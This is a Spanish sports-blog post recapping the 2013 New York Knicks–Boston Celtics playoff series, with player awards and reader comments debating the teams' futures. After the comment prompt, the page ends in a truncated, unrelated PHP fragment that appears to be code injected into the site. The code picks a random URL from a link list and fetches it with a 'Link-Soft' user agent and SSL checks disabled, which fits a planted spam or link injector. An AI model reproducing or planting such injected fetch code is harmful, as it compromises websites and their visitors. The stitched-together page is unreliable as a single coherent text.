Resumen New York Knicks 4 – Boston Celtics 2

04 de May de 2013 por txusma

Comentábamos en la previa que esta podía ser una de las series más entretenidas de la primera ronda. En realidad, la serie ha sido un despropósito. Los Knicks se pusieron 3-0 y se vieron tan superiores que cayeron en sus peores vicios. No se dieron cuenta que las tres primeras victorias se habían cimentado, simplemente, en el buen acierto de Carmelo Anthony y JR Smith en momentos puntuales y en los graves problemas de circulación de balón de los Celtics. Demasiados aclarados, demasiadas jugadas poco trabajadas… Si los Knicks piensan ganar a los Pacers con este estilo de juego van listos.

Cuando los Celtics se vieron contra las cuerdas apareció el orgullo verde. Kevin Garnett se puso el equipo a las espaldas y Jason Terry recordó qué significaba jugar a baloncesto. Los Knicks siguieron a lo suyo pero esta vez Carmelo Anthony se había dejado el acierto en el vestuario y firmó un par de partidos sonrojantes, dignos del agujero negro que le consideran algunos. Con 3-2, la eliminatoria viajaba de nuevo a Boston y no iba a ser yo el que apostara en contra de los Celtics ni en el sexto ni en un hipotético séptimo partido. Lamentablemente, los Celtics no dan para más. El último partido ha sido el perfecto resumen de la eliminatoria: clara superioridad de los Knicks, sesteo y mal juego, reacción de los Celtics, “querer y no poder” y victoria de los Knicks casi sin quererlo ni merecerlo.

Tiempo de reflexión en Boston que puede haber asistido a los últimos minutos de Pierce y Garnett con la camiseta verde. Los Celtics pueden desprenderse de Pierce a cambio de solo 5 millones y Danny Ainge ya ha declarado que hará lo mejor para la franquicia. Suena a ‘reset’ y reconstrucción en torno a Rajon Rondo y Jeff Green. 

PREMIOS

MVP: Carmelo Anthony ha promediado 29’2 puntos, la 2ª mejor marca de un knickerbocker en una serie de playoff, pero ha necesitado 26’7 tiros (38% de acierto). En cambio, Raymond Felton se ha mostrado mucho más regular y consistente y fue el mejor en los 2 partidos en los que Carmelo se volvió literalmente loco y los Knicks perdieron. Acaba la serie con 17’2 puntos, 4 rebotes, 5’3 asistencias y 1’7 robos por partido.

Rookie: Siempre se nos olvida que a sus 35 años Pablo Prigioni es un rookie en la NBA. Evidentemente, su saber estar y su templanza no tiene nada que ver con la de un jovenzuelo y así lo ha demostrado en esta serie. 6 puntos, 2’4 rebotes, 2’4 asistencias y 2’2 robos de media.

Sorpresa: Muy buena serie de Iman Shumpert. Hace un año una lesión de rodilla le estropeó sus primeros playoffs pero en estos ha brillado con luz propia. Ha promediado 9 puntos, 6’8 rebotes y 1’8 robos por partido, erigiéndose como un titán en defensa y un arma más que decente en ataque (53% de acierto en triples). Ayer fue el mejor de los suyos y de no se rmpor su concurso es posible que hoy estuviéramos hablando de un séptimo partido.

Decepción: Paul Pierce se ha exprimido más que nunca (42’5 minutos de media, el máximo de su carrera en unos playoffs) pero no ha estado fino en ataque ni en defensa. Sus porcentajes de acierto han sido irrisorios (37% de acierto en tiros de campo y 27% en triples) y  ha sido siempre superado por el rival con el que se emparejaba. Es posible que hayamos presenciado sus últimos minutos como céltico.

Esfuerzo en vano: Kevin Garnett ha anotado poco pero a reboteado como hace tiempo que no se veía (12’7 puntos y 13’7 rebotes). En ataque, el mejor de los Celtics ha sido un Jeff Green que ya justifica su contrato (20’3 puntos). Habrá que agarrarse a él.

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    ehhhhhh q falta de respeto!!!

    se han olvidado el apartado de ROOKIE, donde Prigioni ha brillado con luz propia como pocos,

    FE DE ERRRATAS YAAAAAAAAAAAAA

      Citar

  2. Esteban dice:
    #2

    los celtiuc sla erraron al continuar con un proyecto que ya venia muy golpeado y casi terminado del año pasado, la renovacion de garnett, y las llegadas de terry y lee para ganar ya, no sirvieron

    garnett no deberia haber renovado y este año hay que despedirse de pierce (en otro grupo puede ser campeon nuevamente)

    rondo y green son los unicos dos jugadores de nivel para algo mas que primera ronda de PO

    un cico titular con rondo, bradley, green, bass y ¿jefferson? con lee, terry, sullinger saliendo el banco, son mas que un equipo de primera ronda? no lo creo

    comprar el salario de pierce, traspaar por una trade exception o que se retire garnett es lo primordial

    luego un año en el ostracismo, sacandose de ensima los contratos de bass, terry y lee
    un pack, bass y terry por el expiring de HUMPRIES tiene sentido, para ambos, ya que los Nets tambien mejorarian
    y bueno a lee habra que comerselo

    callejon con pocas salidas a corto plazo para os celtics

      Citar

  3. rumbero dice:
    #3

    Siendo ventajista (y fan confeso de Rondo) creo que la cosa hubiera ido muy diferente con él. Sin quitarle mérito a la defensa de Woodson, los colapsos de los verdes en los 3 primeros partidos les sentenciaron. Y que raro es ver unos malos de Pierce. A ver que hace Ainge que puede estar movidito por Boston

    Y visto el juego de los Knicks van a necesitar las mejores versiones de Melo y JR porque sino lo pueden pasar mal con estos Pacers

      Citar

  4. Melo15 dice:
    #4

    Yo no l veo tan crudo contra Pacers. Estoy seguro de que Melo se va a salir y fuera de casa los Pacers son una mierda mientras que los Knicks no tanto.
    Ademas Paul George no esta haciendo tampoco unos PO de infarto y aparte de West no tienen a nadie capaz en ataque.
    Yo apostaria con un quinteto alto, con Martin y Chandler mas Prigioni y Felton.
    Si los Knicks se llevan n partido en Indiana se llevan la serie.

      Citar

  5. Jose Luis dice:
    #5

    melo15, eso de que Carmelo se va a salir… vaya primera ronda ha hecho el compi en cuanto a porcentajes y juego. Yo también creo que si asaltan Indianápolis, no veo a los Pacers ganando dos en New York.

      Citar

  6. txusma dice:
    #6

    Esteban:
    ehhhhhh q falta de respeto!!!

    se han olvidado el apartado de ROOKIE, donde Prigioni ha brillado con luz propia como pocos,

    FE DE ERRRATAS YAAAAAAAAAAAAA

    Es que cuesta considerar al gran Prigioni rookie.
    Ya está corregido!

      Citar

  7. Esteban dice:
    #7

    txusma: Es que cuesta considerar al gran Prigioni rookie.
    Ya está corregido!

    jajaja si me imagine!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>